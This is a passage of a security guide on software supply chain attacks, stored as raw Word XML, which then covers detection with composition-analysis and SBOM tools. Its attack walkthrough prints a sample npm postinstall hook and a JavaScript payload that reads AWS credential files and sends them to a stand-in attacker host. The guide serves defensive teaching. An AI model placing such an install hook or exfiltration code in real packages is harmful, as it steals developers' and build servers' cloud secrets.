          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON </w:t>
      </w:r>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>{ "name": "useful-utility-pkg", "version": "2.1.4", "scripts": { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>postinstall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>": "node ./malicious-telemetry.js" }, "dependencies": { "safe-sub-dependency": "^1.0.0" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F19D1D8"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Step 2: Ingestion by the Automated Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C943AD0"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 xml:space="preserve">An automated corporate build server or a developer running a local environment pulls down this update during a routine dependency resolution cycle (e.g., triggering </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> install</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or running a Docker build pipeline).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA11441"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Step 3: Local System Processing &amp; Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3792E186"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 xml:space="preserve">The package manager reads the configuration payload. Because post-install scripts are a standard feature designed to compile native binaries, the system executes </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>./malicioustelemetry.js</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the full execution privileges of the local system user or CI/CD runner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E29857" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sample Malicious Execution Payload (</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>malicious-telemetry.js</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB0018" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">const fs = require('fs'); const http = require('http'); // Locate local configuration files containing high-value secrets const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>envPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '/home/runner/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>/credentials'; if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>fs.existsSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>envPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">)) { const data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>fs.readFileSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>envPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">, 'utf8'); // Exfiltrate secrets out of the corporate network to an attacker-controlled server const req = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>http.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>({ hostname: 'attacker-controlled-c2.com', path:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>collect?data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>=${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Buffer.from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>(data).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">('base64')} </w:t>
      </w:r>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">, method: 'GET' }); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>req.end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>(); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033F854B"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Step 4: Full Compromise &amp; Self-Propagation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E9494A"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The application system processes the script natively. The malicious payload locates the host system's environmental variables, cloud API tokens, or registry publishing keys and transmits them out of the network via an unmonitored HTTP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAD7AD2"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 xml:space="preserve">If the script detects an active registry token on a developer's machine, it uses those hijacked credentials to immediately upload poisoned versions of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>company's own private internal packages</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , turning the victim into a node that spreads the supply chain infection further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504D9A16" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Discovery &amp; Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1D28FD"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Identifying software supply chain failures requires looking beyond custom application logic to analyze the origin, integrity, and operational pipeline of every piece of code running in the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BA5A70" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Automated Testing (Tool-Based Detection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292C3D13"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Traditional DAST tools are largely ineffective at catching supply chain flaws before deployment because they evaluate application behavior from the outside. Instead, specialized automated detection relies heavily on analyzing the manifest and composition files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212FD932" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">SCA (Software Composition Analysis) Tools (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Snyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, OWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>DependencyCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, GitHub </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dependabot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AC1E18" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>What they look for:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> SCA tools scan project manifest files (such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>packagelock.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>pom.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>requirements.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). They build a complete dependency tree, including transitive dependencies, and cross-reference the exact versions against public vulnerability databases (like the NVD or OSV). They alert on anomalies such as the presence of known CVEs, components running on unmaintained version branches, or license mismatches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B4AC5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">SBOM (Software Bill of Materials) Analyzers (e.g., OWASP Dependency-Track, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Syft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Grype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75404F6A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What they look for:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> These tools continuously scan generated SBOM artifacts (formatted in standards like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>CycloneDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or SPDX). They check the integrity hashes of components to verify that a library has not changed since it was signed, flag components without known upstream source repositories, and highlight obsolete functions (CWE-477).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F338C45" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Pipeline and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanners (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Checkov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, Aqua </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Trivy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
